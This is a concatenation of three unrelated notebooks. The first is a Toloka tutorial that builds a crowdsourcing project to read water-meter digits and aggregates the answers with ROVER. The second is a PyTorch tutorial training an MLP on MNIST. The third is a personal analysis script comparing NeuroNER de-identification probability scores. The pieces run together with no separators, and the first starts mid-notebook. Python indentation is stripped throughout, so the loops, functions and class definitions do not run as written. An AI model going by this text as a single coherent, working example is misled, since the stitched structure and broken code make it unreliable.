```
Create task interface.
- Read about configuring the [task interface](https://toloka.ai/docs/guide/reference/interface-spec.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.
- Check the [Interfaces section](https://toloka.ai/knowledgebase/interface?utm_source=github&utm_medium=site&utm_campaign=tolokakit) of our Knowledge Base for more tips on interface design.
- Read more about the [Template builder](https://toloka.ai/docs/template-builder/index.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.
```
header_viewer = tb.MarkdownViewV1("""1. Look at the image
2. Find boxes with the numbers
3. Write down the digits in black section. (Put '0' if there are no digits there)
4. Put '.'
5. Write down the digits in red section""")
image_viewer = tb.ImageViewV1(tb.InputData('image_url'), rotatable=True)
output_field = tb.TextFieldV1(
tb.OutputData('value'),
label='Write down the digits. Format: 365.235',
placeholder='Enter value',
hint="Make sure your format of number is '365.235' or '0.112'",
validation=tb.SchemaConditionV1(
schema={
'type': 'string',
'pattern': r'^\d+\.?\d{0,3}$',
'minLength': 1,
'maxLength': 9,
}
)
)
task_width_plugin = tb.TolokaPluginV1('scroll', task_width=600)
project_interface = toloka.project.TemplateBuilderViewSpec(
view=tb.ListViewV1([header_viewer, image_viewer, output_field]),
plugins=[task_width_plugin],
)
```
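The validation pattern used in the text field above can be sanity-checked locally before launching the pool; a sketch using Python's `re` module with the same regular expression:

```python
import re

# Same pattern as the TextField validation schema
pattern = re.compile(r'^\d+\.?\d{0,3}$')

# Valid readings match; more than 3 red digits or non-digits do not
for value in ['365.235', '0.112', '42', '1.2345', 'abc']:
    print(value, bool(pattern.fullmatch(value)))
```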
Set the data specification and attach the task interface to the project.
> Specifications are a description of input data that will be used in a project and the output data that will be collected from the performers.
Read more about [input and output data specifications](https://yandex.ru/support/toloka-tb/operations/create-specs.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.
```
input_specification = {'image_url': toloka.project.UrlSpec()}
output_specification = {'value': toloka.project.StringSpec()}
project.task_spec = toloka.project.task_spec.TaskSpec(
input_spec=input_specification,
output_spec=output_specification,
view_spec=project_interface,
)
```
Write short and clear instructions.
> Though the task itself is simple, be sure to add examples for non-obvious cases (like when there are no red digits on an image). This helps to eliminate noise in the labels.
Get more tips on designing [instructions](https://toloka.ai/knowledgebase/instruction?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.
```
project.public_instructions = """This task is to solve machine learning problem of digit recognition on the image.<br>
The more precisely you read the information from the image, the more precise the algorithm will be.<br>
Your contribution here is to extract exact information even in complicated and uncertain cases.<br>
We hope your skills will help solve an important science problem.<br><br>
<b>Basic steps:</b><br>
<ul><li>Look at the image and find meter with the numbers in the boxes</li>
<li>Find black numbers/section and red numbers/section</li>
<li>Put black and red numbers separated with '.' to text field</li></ul>"""
```
Create a project.
```
project = toloka_client.create_project(project)
```
## Preparing data
This example uses [Toloka WaterMeters](https://toloka.ai/datasets?utm_source=github&utm_medium=site&utm_campaign=tolokakit) dataset collected by Roman Kucev.
```
!curl https://s3.mds.yandex.net/tlk/dataset/TlkWaterMeters/data.tsv --output data.tsv
raw_dataset = pandas.read_csv('data.tsv', sep='\t', dtype={'value': 'str'})
raw_dataset = raw_dataset[['image_url', 'value']]
with pandas.option_context("max_colwidth", 100):
display(raw_dataset)
```
Let's look at the images from this dataset:
<table align="center">
<tr>
<td>
<img src="https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_53_value_595_825.jpg" alt="value 595.825">
</td>
<td>
<img src="https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_553_value_65_475.jpg" alt="value 65.475">
</td>
<td>
<img src="https://tlk.s3.yandex.net/dataset/TlkWaterMeters/images/id_407_value_21_86.jpg" alt="value 21.860">
</td>
</tr>
<tr><td align="center" colspan="3">
<b>Figure 1.</b> Images from dataset
</td></tr>
</table>
Split this dataset into three parts:
- Training tasks - we'll put them into the training. This type of task must contain ground truth and a hint about how to perform it.
- Golden tasks - we'll put them into the regular pool. This type of task must contain ground truth.
- Regular tasks - for the regular pool. Only the image URL as input.
```
raw_dataset = raw_dataset.sample(frac=1).reset_index(drop=True)
training_dataset, golden_dataset, main_dataset, _ = np.split(raw_dataset, [10, 20, 120], axis=0)
print(f'training_dataset - {len(training_dataset)}')
print(f'golden_dataset - {len(golden_dataset)}')
print(f'main_dataset - {len(main_dataset)}')
```
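The `np.split` call above carves the shuffled frame into consecutive slices at cumulative index boundaries; a toy version of the same slicing on a small array:

```python
import numpy as np

arr = np.arange(10)
# Boundaries [2, 4, 8] produce slices [0:2], [2:4], [4:8], [8:10]
a, b, c, d = np.split(arr, [2, 4, 8])
print(a, b, c, d)  # [0 1] [2 3] [4 5 6 7] [8 9]
```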
## Create a training pool
> Training is an essential part of almost every crowdsourcing project. It allows you to select performers who have really mastered the task, and thus improve quality. Training is also a great tool for scaling your task because you can run it any time you need new performers.
Read more about [selecting performers](https://toloka.ai/knowledgebase/quality-control?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.
```
training = toloka.Training(
project_id=project.id,
private_name='Text recognition training',
may_contain_adult_content=False,
assignment_max_duration_seconds=60*10,
mix_tasks_in_creation_order=False,
shuffle_tasks_in_task_suite=False,
training_tasks_in_task_suite_count=2,
task_suites_required_to_pass=5,
retry_training_after_days=5,
inherited_instructions=True,
)
training = toloka_client.create_training(training)
```
Upload training tasks to the pool.
> It’s important to include examples for all cases in the training. Make sure the training set is balanced and the comments explain why an answer is correct. Don’t just name the correct answers.
```
training_tasks = [
toloka.Task(
pool_id=training.id,
input_values={'image_url': row.image_url},
known_solutions = [toloka.task.BaseTask.KnownSolution(output_values={'value': row.value})],
message_on_unknown_solution=f'Black section is {row.value.split(".")[0]}. Red section is {row.value.split(".")[1]}.',
)
for row in training_dataset.itertuples()
]
result = toloka_client.create_tasks(training_tasks, allow_defaults=True)
print(len(result.items))
```
## Create the main pool
A pool is a set of paid tasks grouped into task pages. These tasks are sent out for completion at the same time.
> All tasks within a pool have the same settings (price, quality control, etc.)
```
pool = toloka.Pool(
project_id=project.id,
# Give the pool any convenient name. You are the only one who will see it.
private_name='Write down the digits in an image.',
may_contain_adult_content=False,
# Set the price per task page.
reward_per_assignment=0.02,
will_expire=datetime.datetime.utcnow() + datetime.timedelta(days=365),
# Overlap. This is the number of users who will complete the same task.
defaults=toloka.Pool.Defaults(default_overlap_for_new_task_suites=3),
# Time allowed for completing a task page
assignment_max_duration_seconds=600,
)
```
- Read more about [pricing principles](https://toloka.ai/knowledgebase/pricing?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base.
- To understand [how overlap works](https://toloka.ai/docs/guide/concepts/mvote.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit), go to the Requester’s Guide.
- To understand how much time it should take to complete a task suite, try doing it yourself.
Attach the training you created earlier and select the accuracy level that is required to reach the main pool.
```
pool.set_training_requirement(training_pool_id=training.id, training_passing_skill_value=75)
```
Select English-speaking performers
```
pool.filter = toloka.filter.Languages.in_('EN')
```
Set up [Quality control](https://toloka.ai/docs/guide/concepts/control.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit). Ban performers who give incorrect responses to control tasks.
> Since tasks such as these have an answer that can be used as ground truth, we can use standard quality control rules like golden sets.
Read more about [quality control principles](https://toloka.ai/knowledgebase/quality-control?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in our Knowledge Base or check out [control tasks settings](https://toloka.ai/docs/guide/concepts/goldenset.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit) in the Requester’s Guide.
```
pool.quality_control.add_action(
collector=toloka.collectors.GoldenSet(),
conditions=[
toloka.conditions.GoldenSetCorrectAnswersRate < 80.0,
toloka.conditions.GoldenSetAnswersCount >= 3
],
action=toloka.actions.RestrictionV2(
scope='PROJECT',
duration=2,
duration_unit='DAYS',
private_comment='Control tasks failed'
)
)
pool.quality_control.add_action(
collector=toloka.collectors.AssignmentSubmitTime(history_size=5, fast_submit_threshold_seconds=7),
conditions=[toloka.conditions.FastSubmittedCount >= 1],
action=toloka.actions.RestrictionV2(
scope='PROJECT',
duration=2,
duration_unit='DAYS',
private_comment='Fast response'
))
```
Specify the number of tasks per page. For example: 3 main tasks and 1 control task.
> We recommend putting as many tasks on one page as a performer can complete in 1 to 5 minutes. That way, performers are less likely to get tired, and they won’t lose a significant amount of data if a technical issue occurs.
To learn more about [grouping tasks](https://toloka.ai/docs/search/?utm_source=github&utm_medium=site&utm_campaign=tolokakit&query=smart+mixing) into suites, read the Requester’s Guide.
```
pool.set_mixer_config(
real_tasks_count=3,
golden_tasks_count=1
)
```
Create pool
```
pool = toloka_client.create_pool(pool)
```
**Uploading tasks**
Create control tasks. In small pools, control tasks should account for 10–20% of all tasks.
> Control tasks are tasks that already contain the correct response. They are used for checking the quality of responses from performers. The performer's response is compared to the response you provided. If they match, it means the performer answered correctly.
> Make sure to include different variations of correct responses in equal amounts.
To learn more about [creating control tasks](https://toloka.ai/docs/guide/concepts/task_markup.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit), go to the Requester’s Guide.
```
golden_tasks = [
toloka.Task(
pool_id=pool.id,
input_values={'image_url': row.image_url},
known_solutions = [
toloka.task.BaseTask.KnownSolution(
output_values={'value': row.value}
)
],
infinite_overlap=True,
)
for row in golden_dataset.itertuples()
]
```
Create pool tasks
```
tasks = [
toloka.Task(
pool_id=pool.id,
input_values={'image_url': url},
)
for url in main_dataset['image_url']
]
```
Upload tasks
```
created_tasks = toloka_client.create_tasks(golden_tasks + tasks, allow_defaults=True)
print(len(created_tasks.items))
```
You can visit the created pool in the web interface and preview its tasks and control tasks.
<table align="center">
<tr>
<td>
<img src="./img/performer_interface.png" alt="Possible performer interface">
</td>
</tr>
<tr><td align="center">
<b>Figure 2.</b> Possible performer interface.
</td></tr>
</table>
Start the pool.
**Important.** Remember that real Toloka performers will complete the tasks.
Double-check that your project configuration is correct before you start the pool.
```
training = toloka_client.open_training(training.id)
print(f'training - {training.status}')
pool = toloka_client.open_pool(pool.id)
print(f'main pool - {pool.status}')
```
## Receiving responses
Wait until the pool is completed.
```
pool_id = pool.id
def wait_pool_for_close(pool_id, minutes_to_wait=1):
sleep_time = 60 * minutes_to_wait
pool = toloka_client.get_pool(pool_id)
while not pool.is_closed():
op = toloka_client.get_analytics([toloka.analytics_request.CompletionPercentagePoolAnalytics(subject_id=pool.id)])
op = toloka_client.wait_operation(op)
percentage = op.details['value'][0]['result']['value']
logging.info(
f' {datetime.datetime.now().strftime("%H:%M:%S")}\t'
f'Pool {pool.id} - {percentage}%'
)
time.sleep(sleep_time)
pool = toloka_client.get_pool(pool.id)
logging.info('Pool was closed.')
wait_pool_for_close(pool_id)
```
Get responses
When all the tasks are completed, look at the responses from performers.
```
answers = []
for assignment in toloka_client.get_assignments(pool_id=pool.id, status='ACCEPTED'):
for task, solution in zip(assignment.tasks, assignment.solutions):
if not task.known_solutions:
answers.append([task.input_values['image_url'], solution.output_values['value'], assignment.user_id])
print(f'answers count: {len(answers)}')
# Prepare dataframe
answers_df = pandas.DataFrame(answers, columns=['task', 'text', 'performer'])
```
Aggregate the results using the ROVER model implemented in [Crowd-Kit](https://github.com/Toloka/crowd-kit#crowd-kit-computational-quality-control-for-crowdsourcing).
```
rover_agg_df = ROVER(tokenizer=lambda x: list(x), detokenizer=lambda x: ''.join(x)).fit_predict(answers_df)
```
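As a rough intuition for what ROVER does (this is not the Crowd-Kit implementation, which also aligns readings of different lengths before voting), a character-level majority vote over equal-length readings looks like this; the readings are made-up examples:

```
from collections import Counter

def char_majority_vote(readings):
    # Pick the most common character at each position.
    # Simplified: assumes all readings have equal length,
    # so no alignment step is needed.
    return ''.join(
        Counter(chars).most_common(1)[0][0]
        for chars in zip(*readings)
    )

# Three performers read the same meter; two agree on every digit.
char_majority_vote(['595.825', '595.825', '595.025'])   # '595.825'
```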
Look at the results.
Some preparations for displaying the results
```
images = rover_agg_df.index.values
labels = rover_agg_df.values
start_with = 0
```
Note: The cell below can be run several times.
```
if start_with >= len(rover_agg_df):
logging.info('no more images')
else:
ipyplot.plot_images(
images=images[start_with:],
labels=labels[start_with:],
max_images=8,
img_width=300,
)
start_with += 8
```
You can see the labeled images. Some possible results are shown in Figure 3 below.
<table align="center">
<tr><td>
<img src="./img/possible_result.png"
alt="Possible results">
</td></tr>
<tr><td align="center">
<b>Figure 3.</b> Possible results.
</td></tr>
</table>
# Multi-Layer Perceptron, MNIST
---
In this notebook, we will train an MLP to classify images from the [MNIST database](http://yann.lecun.com/exdb/mnist/) of hand-written digits.
The process will be broken down into the following steps:
>1. Load and visualize the data
2. Define a neural network
3. Train the model
4. Evaluate the performance of our trained model on a test dataset!
Before we begin, we have to import the necessary libraries for working with data and PyTorch.
```
# import libraries
import torch
import numpy as np
```
---
## Load and Visualize the [Data](http://pytorch.org/docs/stable/torchvision/datasets.html)
Downloading may take a few moments, and you should see your progress as the data is loading. You may also choose to change the `batch_size` if you want to load more data at a time.
This cell will create DataLoaders for each of our datasets.
```
# The MNIST datasets are hosted on yann.lecun.com that has moved under CloudFlare protection
# Run this script to enable the datasets download
# Reference: https://github.com/pytorch/vision/issues/1938
from six.moves import urllib
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
from torchvision import datasets
import torchvision.transforms as transforms
# number of subprocesses to use for data loading
num_workers = 0
# how many samples per batch to load
batch_size = 20
# convert data to torch.FloatTensor
transform = transforms.ToTensor()
# choose the training and test datasets
train_data = datasets.MNIST(root='data', train=True,
download=True, transform=transform)
test_data = datasets.MNIST(root='data', train=False,
download=True, transform=transform)
# prepare data loaders
train_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,
num_workers=num_workers)
test_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size,
num_workers=num_workers)
```
### Visualize a Batch of Training Data
The first step in a classification task is to take a look at the data, make sure it is loaded in correctly, then make any initial observations about patterns in that data.
```
import matplotlib.pyplot as plt
%matplotlib inline
# obtain one batch of training images
dataiter = iter(train_loader)
images, labels = next(dataiter)  # .next() was removed from DataLoader iterators in newer PyTorch
images = images.numpy()
# plot the images in the batch, along with the corresponding labels
fig = plt.figure(figsize=(25, 4))
for idx in np.arange(20):
ax = fig.add_subplot(2, 20 // 2, idx + 1, xticks=[], yticks=[])
ax.imshow(np.squeeze(images[idx]), cmap='gray')
# print out the correct label for each image
# .item() gets the value contained in a Tensor
ax.set_title(str(labels[idx].item()))
```
### View an Image in More Detail
```
img = np.squeeze(images[1])
fig = plt.figure(figsize = (12,12))
ax = fig.add_subplot(111)
ax.imshow(img, cmap='gray')
width, height = img.shape
thresh = img.max()/2.5
for x in range(width):
for y in range(height):
val = round(img[x][y],2) if img[x][y] !=0 else 0
ax.annotate(str(val), xy=(y,x),
horizontalalignment='center',
verticalalignment='center',
color='white' if img[x][y]<thresh else 'black')
```
---
## Define the Network [Architecture](http://pytorch.org/docs/stable/nn.html)
The architecture takes as input a 784-dim Tensor of pixel values for each image, and produces a Tensor of length 10 (our number of classes) that indicates the class scores for that image. This particular example uses two hidden layers and dropout to avoid overfitting.
```
import torch.nn as nn
import torch.nn.functional as F
# define the NN architecture
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# number of hidden nodes in each layer (512)
hidden_1 = 512
hidden_2 = 512
# linear layer (784 -> hidden_1)
self.fc1 = nn.Linear(28 * 28, hidden_1)
# linear layer (n_hidden -> hidden_2)
self.fc2 = nn.Linear(hidden_1, hidden_2)
# linear layer (n_hidden -> 10)
self.fc3 = nn.Linear(hidden_2, 10)
# dropout layer (p=0.2)
# dropout prevents overfitting of data
self.dropout = nn.Dropout(0.2)
def forward(self, x):
# flatten image input
x = x.view(-1, 28 * 28)
# add hidden layer, with relu activation function
x = F.relu(self.fc1(x))
# add dropout layer
x = self.dropout(x)
# add hidden layer, with relu activation function
x = F.relu(self.fc2(x))
# add dropout layer
x = self.dropout(x)
# add output layer
x = self.fc3(x)
return x
# initialize the NN
model = Net()
print(model)
```
### Specify [Loss Function](http://pytorch.org/docs/stable/nn.html#loss-functions) and [Optimizer](http://pytorch.org/docs/stable/optim.html)
It's recommended that you use cross-entropy loss for classification. If you look at the documentation (linked above), you can see that PyTorch's cross-entropy function applies a softmax function to the output layer *and* then calculates the log loss.
```
# specify loss function (categorical cross-entropy)
criterion = nn.CrossEntropyLoss()
# specify optimizer (stochastic gradient descent) and learning rate = 0.01
optimizer = torch.optim.SGD(model.parameters(), lr=0.01)
```
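As a quick numerical check of the statement above (plain Python with made-up logits, no PyTorch needed): cross-entropy for a single example is the negative log of the softmax probability assigned to the true class, and computing it via log-sum-exp gives the same number as softmax followed by log loss.

```
import math

def cross_entropy(logits, target):
    # -log(softmax(logits)[target]) for a single example,
    # computed via log-sum-exp for numerical stability.
    m = max(logits)
    log_sum_exp = m + math.log(sum(math.exp(z - m) for z in logits))
    return log_sum_exp - logits[target]

logits = [2.0, 0.5, -1.0]                 # made-up class scores
total = sum(math.exp(z) for z in logits)
softmax_0 = math.exp(logits[0]) / total   # softmax prob of class 0
# Both routes agree (about 0.2413):
cross_entropy(logits, 0), -math.log(softmax_0)
```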
---
## Train the Network
The steps for training/learning from a batch of data are described in the comments below:
1. Clear the gradients of all optimized variables
2. Forward pass: compute predicted outputs by passing inputs to the model
3. Calculate the loss
4. Backward pass: compute gradient of the loss with respect to model parameters
5. Perform a single optimization step (parameter update)
6. Update average training loss
The following loop trains for 50 epochs; take a look at how the values for the training loss decrease over time. We want it to decrease while also avoiding overfitting the training data.
```
# number of epochs to train the model
n_epochs = 50
model.train() # prep model for training
for epoch in range(n_epochs):
# monitor training loss
train_loss = 0.0
###################
# train the model #
###################
for data, target in train_loader:
# clear the gradients of all optimized variables
optimizer.zero_grad()
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# calculate the loss
loss = criterion(output, target)
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item()*data.size(0)
# print training statistics
# calculate average loss over an epoch
train_loss = train_loss/len(train_loader.dataset)
print('Epoch: {} \tTraining Loss: {:.6f}'.format(
epoch+1,
train_loss
))
```
---
## Test the Trained Network
Finally, we test our best model on previously unseen **test data** and evaluate its performance. Testing on unseen data is a good way to check that our model generalizes well. It may also be useful to be granular in this analysis and take a look at how this model performs on each class as well as looking at its overall loss and accuracy.
```
# initialize lists to monitor test loss and accuracy
test_loss = 0.0
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for evaluation
for data, target in test_loader:
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# calculate the loss
loss = criterion(output, target)
# update test loss
test_loss += loss.item()*data.size(0)
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(batch_size):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
# calculate and print avg test loss
test_loss = test_loss/len(test_loader.dataset)
print('Test Loss: {:.6f}\n'.format(test_loss))
for i in range(10):
if class_total[i] > 0:
print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % (
str(i), 100 * class_correct[i] / class_total[i],
np.sum(class_correct[i]), np.sum(class_total[i])))
else:
print('Test Accuracy of %5s: N/A (no training examples)' % (str(i)))
print('\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % (
100. * np.sum(class_correct) / np.sum(class_total),
np.sum(class_correct), np.sum(class_total)))
```
### Visualize Sample Test Results
This cell displays test images and their labels in this format: `predicted (ground-truth)`. The text will be green for accurately classified examples and red for incorrect predictions.
```
# obtain one batch of test images
dataiter = iter(test_loader)
images, labels = next(dataiter)  # .next() was removed from DataLoader iterators in newer PyTorch
# get sample outputs
output = model(images)
# convert output probabilities to predicted class
_, preds = torch.max(output, 1)
# prep images for display
images = images.numpy()
# plot the images in the batch, along with predicted and true labels
fig = plt.figure(figsize=(25, 4))
for idx in np.arange(20):
ax = fig.add_subplot(2, 20 // 2, idx + 1, xticks=[], yticks=[])
ax.imshow(np.squeeze(images[idx]), cmap='gray')
ax.set_title("{} ({})".format(str(preds[idx].item()), str(labels[idx].item())),
color=("green" if preds[idx]==labels[idx] else "red"))
```
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from scipy import stats
import statsmodels as stm
from os import walk
sns.set(rc={'figure.figsize':(14.7,8.27)})
OxA00=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/Mr1mainSalmanUnary_scorestest.npy")
OxC00=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/Mr1mainSalmanCCCtest.npy")
#Dic00 = np.load("/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/FinalDict.npy").item()
with open("/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag00/test_spacy.txt", 'r') as file :
TokFil00 = file.read().split('\n\n')
OxC00.shape,OxA00.shape
OxA02=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEMr1mainSalmanUnary_scorestest.npy")
OxC02=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEMr1mainSalmanCCCtest.npy")
Dic02 = np.load("/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEFinalDict02.npy", allow_pickle=True).item()
with open("/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag02/NAMEtest_spacy.txt", 'r') as file :
TokFil02 = file.read().split('\n\n')
OxC02.shape,OxA02.shape
OxA01=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEMr1mainSalmanUnary_scorestest.npy")
OxC01=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEMr1mainSalmanCCCtest.npy")
Dic01 = np.load("/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEFinalDict01.npy", allow_pickle=True).item()
with open("/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag01/NAMEtest_spacy.txt", 'r') as file :
TokFil01 = file.read().split('\n\n')
OxC01.shape,OxA01.shape
filenames = np.load("/home/salman/NeuroNER-master/src/SalmanTest/filenames.npy")
def CleanDic(Dic):
NDic={}
for i in filenames:
if len(Dic[i[:-4]])>=1:
NDic["%s"%i[:-4]] = Dic[i[:-4]]
return(NDic)
#NDic00 = CleanDic(Dic00)
NDic01 = CleanDic(Dic01)
NDic02 = CleanDic(Dic02)
#NDic11 = CleanDic(Dic11)
#NDic22 = CleanDic(Dic22)
DirectoryPath="/home/salman/NeuroNER-master/data/Speedi/test/MyTrain385SeparateRepFlag01/"
(_, _, RealFilesNames) = next(walk("%s"%DirectoryPath))
RealFilesNames=[i[:-4] for i in RealFilesNames]
def findBreaks(oxc,limit=300):
breaks=[]
for i,c in enumerate(oxc):
if len(c)>limit:
breaks.append(i)
return(breaks)
C00breaks = findBreaks(OxC00)
C01breaks = findBreaks(OxC01)
C02breaks = findBreaks(OxC02)
#C11breaks = findBreaks(OxC11)
#C22breaks = findBreaks(OxC22)
len(C00breaks),len(C02breaks),len(C01breaks)
msk=np.array([15, 38, 61, 85])
oldfile = 0
file = 0
Prob00max = []
Prob00sum = []
SN=1
for file in range(len(RealFilesNames)):
insideline = 0
if len(NDic02[RealFilesNames[file]][insideline][SN]) != 0:
for i in np.arange(oldfile,C00breaks[file]):
for m,j in enumerate((TokFil00[i].split('\n'))):
for splittt in (j.split(" ")[0].split("^")):
if (len(NDic02[RealFilesNames[file]][insideline][SN]) != 0 and \
len(NDic02[RealFilesNames[file]][insideline][SN][1]) != 0 and \
(NDic02[RealFilesNames[file]][insideline][SN][0]) in splittt):
try:
TEST=TokFil00[i].split('\n')[m-1].split(" ")[:2]
except:
TEST=TokFil00[i].split('\n')[m+1].split(" ")[:2]
Prob00max.append((((np.exp((np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))),\
i,file,insideline,j.split(" ")[:2],m,TEST))
Prob00sum.append((np.sum((np.exp(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m]))))))
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
else:
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
oldfile = C00breaks[file] + 1
oldfile = 0
file = 0
Prob02max = []
Prob02sum = []
SN=1
for file in range(len(RealFilesNames)):
insideline = 0
if len(NDic02[RealFilesNames[file]][insideline][SN]) != 0:
for i in np.arange(oldfile,C02breaks[file]):
for m,j in enumerate((TokFil02[i].split('\n'))):
for splittt in (j.split(" ")[0].split("^")):
if (len(NDic02[RealFilesNames[file]][insideline][SN]) != 0 and \
len(NDic02[RealFilesNames[file]][insideline][SN][1]) != 0 and \
((NDic02[RealFilesNames[file]][insideline][SN][1]) in splittt)):
try:
TEST=TokFil02[i].split('\n')[m-1].split(" ")[:2]
except:
TEST=TokFil02[i].split('\n')[m+1].split(" ")[:2]
Prob02max.append((((np.exp((np.max(OxA02[i][m][msk])))/(np.sum((np.exp(OxA02[i][m])))))),\
i,file,insideline,j.split(" ")[:2],m,TEST))
Prob02sum.append((np.sum((np.exp(OxA02[i][m][msk])))/(np.sum((np.exp(OxA02[i][m]))))))
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
else:
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
oldfile = C02breaks[file] + 1
oldfile = 0
file = 0
Prob01max = []
Prob01sum = []
SN=1
for file in range(len(RealFilesNames)):
insideline = 0
if len(NDic01[RealFilesNames[file]][insideline][SN]) != 0:
for i in np.arange(oldfile,C01breaks[file]):
for m,j in enumerate((TokFil01[i].split('\n'))):
for splittt in (j.split(" ")[0].split("^")):
if (len(NDic01[RealFilesNames[file]][insideline][SN]) != 0 and \
len(NDic01[RealFilesNames[file]][insideline][SN][1]) != 0 and \
((NDic01[RealFilesNames[file]][insideline][SN][1] in splittt))):
Prob01max.append((((np.exp((np.max(OxA01[i][m][msk])))/(np.sum((np.exp(OxA01[i][m])))))),\
i,file,insideline,j.split(" ")[:2],m,TEST))
Prob01sum.append((np.sum((np.exp(OxA01[i][m][msk])))/(np.sum((np.exp(OxA01[i][m]))))))
if insideline < len(NDic01[RealFilesNames[file]]) - 1:
insideline = insideline + 1
else:
if insideline < len(NDic01[RealFilesNames[file]]) - 1:
insideline = insideline + 1
oldfile = C01breaks[file] + 1
NDic01["227-01"][0][SN][1]
TokFil01[1481].split('\n')
len(Prob00sum),len(Prob02sum),len(Prob01sum)
Dic01["227-03"]
Prob01max[29]
Prob00max[30]
len(NDic02[RealFilesNames[file]][insideline][SN][1])
Dic02["308-01"]
Prob02max
TEST=0
for i in RealFilesNames:
for j in NDic02[i]:
if len(j[SN])!=0:
TEST=TEST+1
TEST
NDic02["221-03"]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
# This entry was removed because the doctor's name (first entry) and the patient's name were the same, which caused confusion.
del Prob00max[313]
del Prob00sum[313]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
# These entries were removed because of incorrect labeling of the data!
del Prob00max[355]
del Prob00sum[355]
del Prob00max[354]
del Prob00sum[354]
del Prob00max[353]
del Prob00sum[353]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
# This entry was removed because the doctor's name and the patient's name were the same, which caused confusion.
del Prob00max[389]
del Prob00sum[389]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
# These entries were removed because the doctor's name and the patient's name were the same, which caused confusion.
del Prob00max[466]
del Prob00sum[466]
del Prob00max[465]
del Prob00sum[465]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
TotProbMax00 = [i[0] for i in Prob00max]
TotProbMax01 = [i[0] for i in Prob01max]
TotProbMax02 = [i[0] for i in Prob02max]
sns.set_style('darkgrid')
sns.distplot(TotProbMax00,label="SN unchanged MAX",norm_hist=True)#,bins=100)
sns.distplot(TotProbMax01,label="SN random from inside MAX",norm_hist=True)#,bins=100)
sns.distplot(TotProbMax02,label="SN random from outside MAX",norm_hist=True)#,bins=100)
#sns.distplot(Prob00sum,label="GN & SN unchanged sum",norm_hist=True)
#sns.distplot(Prob01sum,label="SN random from inside sum",norm_hist=True)
#sns.distplot(Prob02sum,label="SN random from outside sum",norm_hist=True)
plt.legend()
sns.set_style('darkgrid')
sns.distplot(np.array(TotProbMax00),label="SN unchanged MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(TotProbMax01,label="SN random from inside MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(TotProbMax02,label="SN random from outside MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(Prob00sum,label="SN unchanged sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(Prob01sum,label="SN random from inside sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(Prob02sum,label="SN random from outside sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
plt.legend()
sns.set_style('darkgrid')
